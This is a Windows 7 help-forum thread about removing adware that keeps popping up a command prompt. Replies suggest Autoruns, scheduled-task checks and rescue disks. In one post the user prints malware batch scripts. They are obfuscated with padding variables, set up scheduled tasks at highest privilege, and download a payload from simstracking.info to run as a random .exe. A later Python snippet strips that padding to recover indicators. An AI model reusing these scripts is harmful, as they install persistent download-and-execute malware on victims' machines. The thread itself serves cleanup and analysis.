Windows 7 Forums


Windows 7: Command Prompt Popping Randomly whenever I log on.

18 Jan 2018   #1
surya1999

Windows 7 Ultimate x64
 
 
Command Prompt Popping Randomly whenever I log on.

So recently, about a week ago, I had somehow installed a PUP on my system while trying to install another software. The installation was taking time so I went away and allowed it to continue, and that's when I came back and realised that I kept on getting redirected to mail.ru every time I opened Chrome.

Even after attempting to remove it from extensions and then trying to recover my Google settings back to normal, Chrome kept on crashing whenever I tried to make Google my default search engine. So I looked up different solutions to the problem and somehow got mail.ru to stop redirecting me. At that point of time, even when I wasn't browsing anything, Chrome would automatically open and show me some popup of an ad or mail.ru.

After I dealt with that, I cleared my temp folder in C:\Windows and have since then downloaded and uninstalled and reinstalled Chrome along with MalwareBytes and a bunch of other antivirus tools such as Chrome Software Toolkit, etc. MalwareBytes showed me 144 threats to my system and I deleted all of them. I even went on to delete the mail.ru folder from Program Files but I know it's still there.

The reason for that is I keep getting these random cmd windows popping in and this is what it shows whenever I freshly log in to my computer:



When I disable my internet connection by removing the cable from the LAN port, it shows this:



I tried visiting simstracking.info but nothing turned up there for me. At least, I couldn't view any of it.

The reason I mentioned the mail.ru story was because this window has been popping up only since mail.ru infected my system. It popped up then too when the virus was still in the system and I let it complete downloading thinking it was software related. I am pretty certain it's trying to redownload its packages and I don't let it. I have tried various antivirus removing methods, using MalwareBytes, Revo Uninstaller Pro, Exterminate It, Zemana Antimalware, but nothing seems to stop the cmd from popping up.

When I open Task Manager and go to the file location, it just redirects me to the place where cmd.exe is located, in the Windows folder, system32 I believe...

I tried this solution as well:

Command Prompt Popping Up [Solved] - Command Prompt - Antivirus / Security / Privacy

and tried the solution given by Ralston18 and Ghoulio, but an error message keeps on popping up in PowerShell for me, which is shown here:



Also, you can see only a skype service showed up for me whereas the original tenforums post has many more services shown. I have tried to tell you as much about this problem as I can and I am desperate for help now. Any additional help that is required of me, I am ready to do such as running scripts/commands, etc.


19 Jan 2018   #2
mrjimphelps

Linux Mint 18.2 xfce 64-bit (VMWare host) / Windows 8.1 Pro 32-bit (VMWare guest)
 
 

Here's what you could do. The higher an option appears on the list below, the better it would be. For example, option 1 is the best, option 2 is the next best, and option 3 is the next best after option 2.

Option 1 - Unplug the computer and remove the hard drive. After a few minutes, install a new hard drive, and plug the computer back in. Do a clean install of Windows 7 on the new hard drive.

Option 2 - Boot with a Linux Live DVD, remove all partitions on the hard drive, create one new partition, then shut down and reboot with the Windows 7 install disk, and do a format and a Windows 7 install.

Option 3 - Reboot with a pre-Windows scanner DVD in the drive (e.g. Windows Defender Offline), booting to the DVD, then running a complete pre-Windows scan of your hard drive. Once that has finished, reboot without the DVD in the drive.

I think you have some kind of malware which has buried itself very deeply on your hard drive. The best way to deal with it may be to just replace the hard drive.
21 Jan 2018   #3
surya1999

Windows 7 Ultimate x64
 
 

Thanks for the reply. But unfortunately those options do not work for me; there must be some other way of solving the issue... The virus probably has a boot-time script or something which it planted as a fail-safe, before I removed the virus, to download itself back onto the machine... It does not pose a direct threat as long as I am always vigilant in closing the command prompt downloader after every login, but it's very inconvenient for me and there is always the added danger of missing it. There must be some way to stop a specific boot-time script or something, or find where it is located. Also, how do I stop the Windows PowerShell Access Denied error from occurring?

21 Jan 2018   #4
surya1999

Windows 7 Ultimate x64
 
 

Quote:
When I disable my internet connection by removing the cable from the LAN port, it shows this:



I tried visiting simstracking.info but nothing turned up there for me. At least, I couldn't view any of it.
Sorry, that's the wrong image, I accidentally uploaded the same one.
Here's what happens when I close my internet connection:



Also, I seem to have gotten a new removable drive which has appeared on my computer. I didn't look into it before, but even after disconnecting all of my usb devices, I seem to get H: drive now on my computer:

21 Jan 2018   #5
Barman58

Windows 10 Pro x64 x3, Ubuntu
 
 

Try to locate the call to cmd by using Autoruns from Microsoft. This utility lists all the startup items set to run when you start your system and allows you to disable them (to find out which is the cause of your issue) and eventually delete the startup command that is the issue.

There is a "Known Hijacks" tab, which is where I would start, but if there is nothing obvious here (I would actually disable any entries here anyway, and then delete them when all is seen to be well), carefully go through all the tabs, and if you see a suspicious entry, disable it and reboot. If the issue stops, you know you have found the source and can go back and delete the entry in Autoruns; if not, then re-enable the entry and try the next suspicious one...

Only do one entry at a time so as not to confuse the issues.

This is not a magic bullet solution, but although it may take some time it's a reliable method.

If you find and remove the issue and it comes back, then the likely cause would be a scheduled task, which can be searched for using the Windows built-in Task Scheduler. Again, this can take time, but it is less costly than new hardware and should be capable of removing your issue.

Also, I would suggest that you could download a number of free anti-malware packages to see if they can remove the problem for you (always use a specific removal tool for any AV you try before using another option).
21 Jan 2018   #6
surya1999

Windows 7 Ultimate x64
 
 

Oh my god, thank you so much Barman58 for your solution. The virus thankfully did not bury itself so deep that it was impossible to get rid of. Autoruns seems to have done it! I was successfully able to find out the processes which were causing the problem and I hope I have removed them all by reading the .bat files as best I could with my rudimentary knowledge. The .bat files had created scheduled tasks for the programs to run and that's what was causing the cmd to appear for downloading files.

For further reference and assistance to any others facing the issue, this is where the files were located (I deleted all of them and the issue seems to have stopped):
Code:
C:\Users\home\VoYdMiSyYoat(.bat/file)
C:\Users\home\AppData\Roaming\JBUaUyaSsE(.bat/file)
C:\Program Files (x86)\HWHi(.bat/file)
C:\Program Files (x86)\pETWiJsFWxCYw(.bat/file)
C:\Program Files (x86)\Common Files\uAAM.exe

Don't know whether this was related or not, but I deleted it anyways:
C:\Program Files (x86)\Common Files\isNUYFSvOwnmf.exe
I also cleared all the temp data at C:\Windows\Temp and C:\Users\home\AppData\Local\Temp (The latter is the one the virus used to store its data). In addition to that, I deleted the processes from scheduled tasks (the ones highlighted in red) by running Autoruns as provided by @Barman58 (kudos to you!):


To be sure that these were the files causing the problem, I checked their source code as well by taking a risk of running HWHi and indeed the same command prompt download came up which I closed well in time.

I am also adding the source code for the 4 bat files for confirmation if I correctly deleted everything and not missed anything to be double sure:

VoYdMiSyYoat:
Code:
start /min cmd /c "C:\Program Files (x86)\HWHi.bat"
exit
JBUaUyaSsE:
Code:
start /min cmd /c "C:\Program Files (x86)\pETWiJsFWxCYw.bat"
exit
HWHi:
Code:
@echo off
copy /y "C:\Program Files (x86)\pETWiJsFWxCYw" "C:\Pro%fOngiitYuYAs%gram F%lAfRPI%iles (x86)\pET%kOTCKaY%WiJsFWxCYw.bat"
copy /y "C%yeZAAchS%:\Users\home\AppData%ADexIGIgLuDIo%\%auUZ%Roami%YpeAgOiInEyRj%ng\jBUaUYaSsE" "C:%pfuCpUyu%\Use%hSylCa%rs\home\AppDa%irkAzuIZ%ta\Roamin%eeERU%g\j%EOaNEAfDaeHTC%BUaUY%owOOdyrXW%aSsE.bat"
schtasks /create /tn "rOxQmuwMEueX" /tr "'C:\Users\home\A%eUuUJ%ppData\Roaming\jBUaUYaSsE.bat' " /sc ONLOG%wZEaLEhAIy%ON /de%WHPAFm%lay 0003:00 /rl highest /f
set qTJnzyfjxUUL=%rANDOm%%RANDOm%
"C:%gIOEYiEA%\Program Files (x86)\C%sUoO%ommon Files%enpYYYfYyaho%\uAAM.exe" /tr%xAZr%AnsF%GAySxwe%ER eLaSuLIKUWP /DOwn%hATgIkQWYLcLv%LoAD /PrIo%fQoUvieDgiz%ritY hIgh http://simstracking%wScU%.info%qhyomY%/jrej%eMayRt%3%EbycjeAi%w50j9p4.%YeuaeyCeEA%zip "C:\Us%aUabiLW%ers\home\AppData\Local%aaIDIKmIYvu%\Temp\ylE%ZEoEpYyMybyYN%laoaIeerqF.zip"
rename "%UOYWqxVe%C:\Users\%WpxAYieUernZ%home\AppData\Loca%YgVY%l\Temp\y%GaWaAUVoHJfn%lEla%dpuaaJepU%oaIeerq%CEAI%F.zip%oAJfryunLyyc%" %qTJnzyfjxUUL%.exe%YyeeoXsyLVjuy%
cmd /c ""C:\Users\home\AppData\%IYeswKEEYi%Local\Temp\%qTJnzyfjxUUL%.exe" i"
pETWiJsFWxCYw:
Code:
@echo off
copy /y "C:\Program Files (x86)\HWHi" "C:%gIfyvcAZ%\Progra%IoAdjldxDuhA%m Files (x86)\HWHi.bat"
copy /y "C%twAOyiOHu%:\Users\home%OvYcadA%\VoYdMiSyYoaT" "C:%KzeuYo%\Users\home%QgIWoyYtyZyn%\VoYdMi%LLkYikeOiO%SyYoa%iHenlEkwvj%T.bat%VWoATVPjAgM%"
s%AehWLIq%chtasks /create /tn "i%yLyYvIOwIla%VaYnEhi%SeFIoBWeR%" /tr "'%edoyGoydqOOra%C:%MoIeRYZNAM%\Users\home\VoYdMiSyYoaT.bat' " /sc m%SSeS%inute /mo 180 /rl highe%iIbxiiyOGZw%s%GtPUHOhu%t /f%IHuiiovhA%
se%yeyikkIWWwIkI%t ZaTOixYJiH%ORYz%O%GLBQoAEm%=%rAnDom%%raNdom%
"C:\Program Files (x86)\%biFJPyI%Common Fi%AuuIVOLQMuyx%les\uAAM.exe" /TransfeR OINKyAQtPaVE /DOWNlOAD /p%OORuA%Ri%uUnerElQyOir%ORity h%MRLegov%iGH htt%ucUxoxNK%p://%UTAvhiVOc%simst%enPwOAeaiUxEx%racking.info/jrej3w50j9p4%YZkigph%.zip "C:\User%xUPiQ%s\hom%ueHaySn%e\AppData\Local\Temp\OuaaIPIUaej.z%SGcFgNChoi%ip"
ren%YoEHCwI%ame "C:\Users\home%IsFBEvsaOkB%\AppData\Local\%EMrCdi%Temp\OuaaI%UiyATeO%PIU%NUAA%aej.zip" %ZaTOixYJiHO%.ex%puUdRuoFEdP%e
cmd /%ySIiglto%c ""C:\User%oKUwqrAU%s\home\AppDat%uEON%a\Local\Temp\%ZaTOixYJiHO%.exe%IOOiiwucufIB%" i"
Reference Images:





Finally, I would gladly appreciate it if someone could go over the code and check if I missed deleting something. Earlier, Windows kept on crashing with a blue crash dump screen after it had been on for 1 or 2 hours. I will wait to see if the problem occurs again before marking this as solved. Thank you so much once again Barman58!!
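The HWHi and pETWiJsFWxCYw listings in post #6 are padded with `%name%` tokens for variables that are never set, which cmd.exe expands to nothing when the batch file runs. The Python below is an added example, not part of any post in this thread: it strips that padding and lists the scheduled-task names, triggers, download URL and file paths to check for. The `KNOWN` list and the function names are assumptions of this example; `SAMPLE` is four lines copied from the HWHi listing.

```python
import re

TOKEN = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# Assumption: variables normally defined on Windows; every other %name% is
# treated as undefined, which cmd.exe expands to an empty string in a .bat.
KNOWN = {"random", "temp", "tmp", "appdata", "localappdata", "userprofile",
         "programfiles", "systemroot", "windir", "comspec"}

# Four lines copied from the HWHi listing in post #6 (never executed here).
SAMPLE = r'''schtasks /create /tn "rOxQmuwMEueX" /tr "'C:\Users\home\A%eUuUJ%ppData\Roaming\jBUaUYaSsE.bat' " /sc ONLOG%wZEaLEhAIy%ON /de%WHPAFm%lay 0003:00 /rl highest /f
set qTJnzyfjxUUL=%rANDOm%%RANDOm%
"C:%gIOEYiEA%\Program Files (x86)\C%sUoO%ommon Files%enpYYYfYyaho%\uAAM.exe" /tr%xAZr%AnsF%GAySxwe%ER eLaSuLIKUWP /DOwn%hATgIkQWYLcLv%LoAD /PrIo%fQoUvieDgiz%ritY hIgh http://simstracking%wScU%.info%qhyomY%/jrej%eMayRt%3%EbycjeAi%w50j9p4.%YeuaeyCeEA%zip "C:\Us%aUabiLW%ers\home\AppData\Local%aaIDIKmIYvu%\Temp\ylE%ZEoEpYyMybyYN%laoaIeerqF.zip"
cmd /c ""C:\Users\home\AppData\%IYeswKEEYi%Local\Temp\%qTJnzyfjxUUL%.exe" i"'''


def defined_names(script):
    """Variables the script assigns with `set`. Every token is stripped
    first, because the keyword and the name can themselves be split by
    padding (as in the pETWiJsFWxCYw listing)."""
    bare = TOKEN.sub("", script)
    return {n.lower() for n in re.findall(r"(?im)^\s*set\s+([^=\s]+)=", bare)}


def deobfuscate(script):
    """Drop padding tokens; keep variables that really hold a value."""
    keep = KNOWN | defined_names(script)  # cmd variable names ignore case
    return TOKEN.sub(
        lambda m: m.group(0) if m.group(1).lower() in keep else "", script)


def indicators(script):
    """Artifacts to look for in Task Scheduler, Autoruns and on disk."""
    clean = deobfuscate(script)
    return {
        "tasks": re.findall(r'(?i)schtasks\s+/create\s+/tn\s+"([^"]+)"', clean),
        "triggers": re.findall(r"(?i)/sc\s+(\S+)", clean),
        "urls": re.findall(r'(?i)https?://[^\s"]+', clean),
        "paths": re.findall(
            r"""(?i)[a-z]:\\[^"'\r\n]*?\.(?:exe|bat|zip)\b""", clean),
    }


if __name__ == "__main__":
    for kind, values in indicators(SAMPLE).items():
        print(kind, values)
```

The recovered task name and `ONLOGON` trigger match the scheduled-task cause found with Autoruns; the `%qTJnzyfjxUUL%` variable is left in place because the script sets it to two random numbers, so the final .exe name in Temp differs on every run.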
22 Jan 2018   #7
RickC998

Windows 7 Ultimate 32-bit
 
 

For a belt'n'braces approach, download the AVG Rescue CD and create either a USB from it (best, if your device will boot from USB) or CD (2nd best - slower in operation).

Boot from the AVG Rescue media and update the definitions. (It boots with network support included, so it can download the latest AV definitions from the internet.)

Once updated, run a full scan. This may catch any remnants, particularly any rootkit-like malware that hides from the OS when booted normally.

The only downside of AVG Rescue is that it is very slow to scan, even when booted from USB.

Hope this helps...
22 Jan 2018   #8
mrjimphelps

Linux Mint 18.2 xfce 64-bit (VMWare host) / Windows 8.1 Pro 32-bit (VMWare guest)
 
 

AVG Rescue CD is an excellent choice. It operates on the same principle as Windows Defender Offline (WDO); but I'm certain that it is better than WDO at dealing with malware. I wonder if it is a Linux antivirus scanner, or only a Windows antivirus scanner; in other words, does it look for Linux viruses, or just for Windows viruses?

There are some really cool tools on the AVG Rescue CD:
* Links Text Browser -- browse the web in text mode! Will be a lot faster, and you probably won't be at as much risk for picking up malware.
* Midnight commander -- sounds like a modern version of Norton Commander (remember that program?).

Another similar option would be to set up a Linux Live flash drive and install Sophos A/V for Linux. Sophos A/V for Linux scans for Linux, Windows, Mac, and Android malware:

https://www.sophos.com/en-us/product...for-linux.aspx
22 Jan 2018   #9
RickC998

Windows 7 Ultimate 32-bit
 
 

Quote: Originally Posted by mrjimphelps
AVG Rescue CD is an excellent choice. It operates on the same principle as Windows Defender Offline (WDO); but I'm certain that it is better than WDO at dealing with malware. I wonder if it is a Linux antivirus scanner, or only a Windows antivirus scanner; in other words, does it look for Linux viruses, or just for Windows viruses?
It's just a Windows AV scanner, i.e. it scans known Windows locations, including the Windows registry.

Although AVG also has AV tools for Macs (Mountain Lion or newer), the AV Rescue system doesn't mention Macs so I assume it's Windows only.
06 Feb 2018   #10
surya1999

Windows 7 Ultimate x64
 
 

Thank you all for your help. I tried out the above-mentioned software and my system has been constantly running for about 1 week and no further problem has occurred. I have since also downloaded Antivirus to protect against any future viruses. I sincerely thank everyone for their help and advice.